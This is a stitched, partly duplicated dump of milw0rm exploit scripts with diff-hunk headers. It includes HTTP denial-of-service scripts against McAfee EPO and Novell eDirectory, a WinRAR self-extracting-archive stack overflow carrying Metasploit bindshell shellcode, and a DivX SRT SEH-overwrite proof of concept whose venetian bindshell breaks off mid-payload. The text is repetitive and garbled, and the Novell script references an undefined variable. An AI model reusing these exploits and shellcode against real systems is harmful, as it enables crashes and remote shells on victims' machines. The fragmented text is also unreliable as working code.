buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()
while 1:
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*243
req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n'
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
data=expl.recv(1024)
print data
expl.close()
sleep(0.1)
# milw0rm.com [2008-04-02]
#!/usr/bin/python
# Mcafee EPO 4.0 (and others) FrameworkService.exe DOS
# More than meets the eye
# Discovered and coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/mcafee_again.py.txt
# EAX 00840C30
# ECX 00837830
# EDX 01EACF18
# EBX 00004000
# ESP 01EAFF04
# EBP 01EAFF38
# ESI 00837830
# EDI 643AC780 naCmnLib.CnaLogger::AddMessageA
# EIP 42424242
import socket
import os
import sys
from time import sleep
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()
while 1:
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*243
req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n'
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
data=expl.recv(1024)
print data
expl.close()
sleep(0.1)
# milw0rm.com [2008-04-02]


@ -1,21 +1,21 @@
#!/usr/bin/python
# Novel eDirectory HTTP DOS
# Discovered and coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/novel-edir.py.txt
import socket
import os
import sys
from time import sleep
biff="<"*2048
print "[*] Payload sent "+ str(len(buff))
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8028 ) )
expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n')
data=expl.recv(1024)
print data
expl.close()
# milw0rm.com [2008-04-02]
#!/usr/bin/python
# Novel eDirectory HTTP DOS
# Discovered and coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/novel-edir.py.txt
import socket
import os
import sys
from time import sleep
biff="<"*2048
print "[*] Payload sent "+ str(len(buff))
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8028 ) )
expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n')
data=expl.recv(1024)
print data
expl.close()
# milw0rm.com [2008-04-02]


@ -28,6 +28,6 @@ try:
s.close()
print "\nRun this script again, and server should crash."
except:
print "\nCould not connect to sever!"
# milw0rm.com [2004-10-26]
print "\nCould not connect to sever!"
# milw0rm.com [2004-10-26]


@ -1,86 +1,86 @@
"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
======================================================
Tested Version(s)..: WinRAR 3.60 beta 4
Original Author.............: posidron
Shellcode Stuffing .........: muts
"""
import os, sys
winrar__ = 'C:\WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
sc +="\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
sc +="\x4e\x36\x46\x32\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
sc +="\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
sc +="\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58"
sc +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
sc +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
sc +="\x46\x4f\x4b\x43\x46\x55\x46\x52\x4a\x52\x45\x47\x45\x4e\x4b\x48"
sc +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
sc +="\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x48"
sc +="\x49\x48\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d"
sc +="\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48"
sc +="\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36"
sc +="\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
sc +="\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x57\x43\x57"
sc +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
sc +="\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
sc +="\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
sc +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
sc +="\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
sc +="\x43\x45\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x51"
sc +="\x4e\x35\x48\x56\x43\x45\x49\x38\x41\x4e\x45\x59\x4a\x56\x46\x4a"
sc +="\x4c\x51\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
sc +="\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
sc +="\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
sc +="\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d"
sc +="\x42\x55\x46\x55\x46\x45\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
sc +="\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
sc +="\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x36"
sc +="\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x32\x4e\x4c"
sc +="\x49\x58\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
sc +="\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x32"
sc +="\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
sc +="\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
sc +="\x48\x4d\x4b\x55\x47\x45\x44\x55\x41\x55\x41\x45\x41\x45\x4c\x56"
sc +="\x41\x30\x41\x35\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
sc +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46"
sc +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
sc +="\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
sc +="\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
sc +="\x4f\x4f\x42\x4d\x5a"
buf = "Path=" + "\x90" * (2035-len(sc)) +sc+ "\x3c\x15\xdc\x77" + "\x90" * 8 + "\xEB\x30\x90\x90" + "\r\nSavePath\r\n" # JMP ESP XP SP2
try:
info = open(sfxnfo__, "w+b")
info.write(buf)
info.close()
except IOError:
sys.exit("Error: unable to create: " + sfxnfo__)
print "Creating archive:",
os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__])
os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__])
print "done."
print "Executing:",
# debug only!
#os.spawnv(os.P_WAIT, result__, [result__, ""])
#print "done."
print "Cleaning up:",
os.remove(sfxnfo__)
print "done."
# milw0rm.com [2006-07-05]
"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
======================================================
Tested Version(s)..: WinRAR 3.60 beta 4
Original Author.............: posidron
Shellcode Stuffing .........: muts
"""
import os, sys
winrar__ = 'C:\WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
sc +="\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
sc +="\x4e\x36\x46\x32\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
sc +="\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
sc +="\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58"
sc +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
sc +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
sc +="\x46\x4f\x4b\x43\x46\x55\x46\x52\x4a\x52\x45\x47\x45\x4e\x4b\x48"
sc +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
sc +="\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x48"
sc +="\x49\x48\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d"
sc +="\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48"
sc +="\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36"
sc +="\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
sc +="\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x57\x43\x57"
sc +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
sc +="\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
sc +="\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
sc +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
sc +="\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
sc +="\x43\x45\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x51"
sc +="\x4e\x35\x48\x56\x43\x45\x49\x38\x41\x4e\x45\x59\x4a\x56\x46\x4a"
sc +="\x4c\x51\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
sc +="\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
sc +="\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
sc +="\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d"
sc +="\x42\x55\x46\x55\x46\x45\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
sc +="\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
sc +="\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x36"
sc +="\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x32\x4e\x4c"
sc +="\x49\x58\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
sc +="\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x32"
sc +="\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
sc +="\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
sc +="\x48\x4d\x4b\x55\x47\x45\x44\x55\x41\x55\x41\x45\x41\x45\x4c\x56"
sc +="\x41\x30\x41\x35\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
sc +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46"
sc +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
sc +="\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
sc +="\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
sc +="\x4f\x4f\x42\x4d\x5a"
buf = "Path=" + "\x90" * (2035-len(sc)) +sc+ "\x3c\x15\xdc\x77" + "\x90" * 8 + "\xEB\x30\x90\x90" + "\r\nSavePath\r\n" # JMP ESP XP SP2
try:
info = open(sfxnfo__, "w+b")
info.write(buf)
info.close()
except IOError:
sys.exit("Error: unable to create: " + sfxnfo__)
print "Creating archive:",
os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__])
os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__])
print "done."
print "Executing:",
# debug only!
#os.spawnv(os.P_WAIT, result__, [result__, ""])
#print "done."
print "Cleaning up:",
os.remove(sfxnfo__)
print "done."
# milw0rm.com [2006-07-05]


@ -1,165 +1,165 @@
#!/usr/bin/python
#######################################################################
# DivX 6.6 SRT SEH overwrite PoC
# Tested on XP SP2
# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD
# muts..at..offensive-security...dot..com
# chris..at..offensive-security...dot..com
# http://www.offensive-security.com/0day/divx66.py.txt
# Notes: Unicode buffer - real pita.
# Greetz to our wives - thanks for the couch!
#######################################################################
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
#######################################################################
# file = name of avi video file
file="infidel.srt"
# Unicode friendly POP POP RET somewhere in DivX 6.6
# Note: \x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods
ret="\x94\x48"
# Align stack for register save
nudge="\x48\x6d"
# Payload building blocks
buffer="\x41" * 1032
xchg="\x94\x6d" # Swap back EAX, ESP for stack save,nop
pushad="\x60\x6d" # Save stack registers,nop
pushfd="\x9c\x6d"
align_buffer="\x05\xFF\x3C\x6D\x2D\xe1\x3C\x6D\x2D\xFF\x10\x6D\x05\xFF\x10\x6D" # Point to end of buffer
align_eax="\x2D\x2F\x10\x6D\x05\x10\x10\x6D" # Align EAX for popad/fd
popfd="\x9D\x6D" # popfd,nop
popad="\x61\x6D"# popad,nop
padding="\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70" # Crawl with remaining strength on bleeding knees to shellcode
rest= "\x01" * 5000000 # Buffer and shellcode canvas
# PoC Venetian Bindshell on port 4444 - ph33r
# Built on alternating 00 01 surface
# Venetian self decoding bindshell - 1580 bytes
bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer +
"\x80\xFB\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80"
"\x4D\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\xF9\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\x60\x6D"
"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x6C\x6D\x40\x6D\x80\x23\x6D\x40"
"\x6D\x80\x24\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x45\x6D\x40\x6D"
"\x80\x3B\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x7B\x6D\x40\x6D\x80"
"\x05\x6D\x40\x6D\x80\x77\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xEE"
"\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x4E\x6D\x40\x6D\x80\x18\x6D"
"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x5F\x6D\x40\x6D\x80\x1F\x6D\x40"
"\x6D\x80\x01\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\x49\x6D\x40\x6D"
"\x80\x8A\x6D\x40\x6D\x80\x34\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
"\x01\x6D\x40\x6D\x80\xED\x6D\x40\x6D\x80\x31\x6D\x40\x6D\x80\xBF"
"\x6D\x40\x6D\x80\x99\x6D\x40\x6D\x80\xAB\x6D\x40\x6D\x80\x84\x6D"
"\x40\x6D\x80\xBF\x6D\x40\x6D"
"\x80\x74\x6D\x40\x6D\x80\x06\x6D\x40\x6D\x80\xC1\x6D\x40\x6D\x80"
"\xC9\x6D\x40\x6D\x80\xEF\x6D\x80\x1E\x6D\x40\x6D\x40\x6D\x80\xC2"
"\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\x3A\x6D"
"\x40\x6D\x80\x54\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x28\x6D\x40"
"\x6D\x80\x74\x6D\x40\x6D\x80\xE5\x6D\x40\x6D\x80\x8A\x6D\x40\x6D"
"\x80\x5F\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80"
"\xEA\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x0C"
"\x6D\x40\x6D\x80\x4A\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x5E\x6D"
"\x40\x6D\x80\x1C\x6D\x40\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x02"
"\x6D\x40\x6D\x80\x2C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x89\x6D"
"\x40\x6D\x80\x6B\x6D\x40\x6D\x80\x24\x6D\x40\x6D\x80\x1B\x6D\x40"
"\x6D\x80\x61\x6D\x40\x6D\x80\xC2\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
"\x80\xDA\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
"\x43\x6D\x40\x6D\x80\x2F\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x3F"
"\x6D\x40\x6D\x80\x0C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x70\x6D"
"\x40\x6D\x80\x1B\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x8A\x6D\x40"
"\x6D\x80\x40\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x5E\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\x8E\x6D\x40\x6D\x80\x4D\x6D\x40\x6D\x80"
"\x0E\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x53\x6D"
"\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\x32\x6D\x40"
"\x6D\x80\x32\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\x77\x6D\x40\x6D"
"\x80\x72\x6D\x40\x6D\x80\x32\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80"
"\x54\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67"
"\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\xEC\x6D\x40\x6D\x80\xFC\x6D"
"\x40\x6D\x80\x3A\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD6\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80\x89\x6D\x40\x6D"
"\x80\xE4\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x80\x6D\x40\x6D\x80"
"\xED\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x02\x6D\x40\x6D\x80\x54"
"\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xD8\x6D\x40"
"\x6D\x80\x09\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\xAD\x6D\x40\x6D"
"\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80"
"\x53\x6D\x40\x6D\x80\x52\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x52"
"\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D"
"\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD0\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
"\x80\x10\x6D\x40\x6D\x80\x5C\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80"
"\x53\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x94"
"\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3\x6D\x40\x6D\x80\x1A\x6D"
"\x40\x6D\x80\x6F\x6D\x40\x6D\x80\xC7\x6D\x40\x6D\x80\x56\x6D\x40"
"\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x6A\x6D\x40\x6D"
"\x80\x0F\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80"
"\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3"
"\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xE9\x6D"
"\x40\x6D\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40"
"\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xE4\x6D\x40\x6D\x80"
"\x49\x6D\x40\x6D\x80\x85\x6D\x40\x6D\x80\x49\x6D\x40\x6D\x80\x56"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x50\x6D"
"\x40\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x54\x6D\x40"
"\x6D\x80\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x93\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80"
"\xC6\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x69\x6D\x40"
"\x6D\x80\x64\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
"\x80\x62\x6D\x40\x6D\x80\x6D\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80"
"\xE5\x6D\x40\x6D\x80\x69\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x58"
"\x6D\x40\x6D\x80\x29\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\x89\x6D"
"\x40\x6D\x80\xE6\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x43\x6D\x40"
"\x6D\x80\x89\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
"\x80\xBF\x6D\x40\x6D\x80\xF3\x6D\x40\x6D\x80\xA9\x6D\x40\x6D\x80"
"\xFE\x6D\x40\x6D\x80\x41\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xFD"
"\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x2B\x6D\x40\x6D\x80\x93\x6D"
"\x40\x6D\x80\x8C\x6D\x40\x6D\x80\x7A\x6D\x40\x6D\x80\x37\x6D\x40"
"\x6D\x80\xAB\x6D\x40\x6D\x80\xAA\x6D\x40\x6D\x80\xAB\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\x72\x6D\x40\x6D\x80\xFD\x6D\x40\x6D\x80"
"\xB3\x6D\x40\x6D\x80\x15\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\x74"
"\x6D\x40\x6D\x80\x44\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D"
"\x40\x6D\x80\x5A\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\x51\x6D\x40"
"\x6D\x80\x51\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x51\x6D\x40\x6D"
"\x80\x69\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80"
"\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\xAD\x6D"
"\x40\x6D\x80\xD8\x6D\x40\x6D\x80\x05\x6D\x40\x6D\x80\xCD\x6D\x40"
"\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D\x40\x6D"
